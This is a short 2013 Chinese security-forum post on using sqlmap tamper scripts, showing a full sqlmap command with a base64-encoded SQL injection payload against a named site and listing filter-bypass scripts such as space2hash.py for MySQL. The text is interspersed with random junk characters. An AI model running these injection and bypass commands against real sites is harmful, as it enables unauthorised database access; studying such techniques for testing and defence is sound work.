找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2226|回复: 0
打印 上一主题 下一主题

SQlMap Tamper注入Base64编码注入点

[复制链接]
跳转到指定楼层
楼主
发表于 2013-11-23 15:50:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?/ H$ e  l" G% r0 n. j6 W

2 ^2 J9 |2 a4 d% dsqlmap的tamper里有个base64encode.py
1 t0 V: z, i6 Y. t  t6 j, j1 Z# t, e9 \$ f( j) j3 L  P
使用如下/ o/ _2 P$ L: u8 ?. s* k% s
9 b! R- ~3 q3 g" _; g& g; S. Y
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs, F! ^3 T' c* p' k5 E

$ G8 X! ~1 v7 r' @, `/ @- `3 G1 D, N7 f2 n5 g
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
- I! I. B0 Z: P( ~: r5 I: L
0 P& @: F% F: v" c& E其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
- {7 H8 t' d: d$ I# e
8 h7 ^% S0 ]. Z4 U- U5 B$ Aspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入& v, G/ ?# ?# t; }5 K% O% h  z" Y' l
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
8 \2 [* R( z8 m首先确定目标数据库版本,然后选择相应的脚本。6 H- i3 e& @9 y  \; p
-v 3 --batch --tamper "space2hash.py", D: d& ^, {/ P9 P) v; G- d
7 K4 x- J0 M0 n  x
还有其他一些插件:0 t8 D& W) b% q- W0 {" p# d
encodes编码 ——charencode.py
5 ?5 e# n# @1 g- l+ ^- `base64编码 —— base64encode.py
/ T; P% f* K4 f2 w替换空格和关键字 —— halfversionedmorekeywords.py
' X5 g9 ~$ J- H: r6 z* v" q  Z; h
2 s- J" K% N9 T& w5 ^" \

% U% J9 T# h3 y5 Q5 a( o- t% `; k  [" E3 v8 F( z- s- V6 B& V
' B  H$ r+ n' W( D9 s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表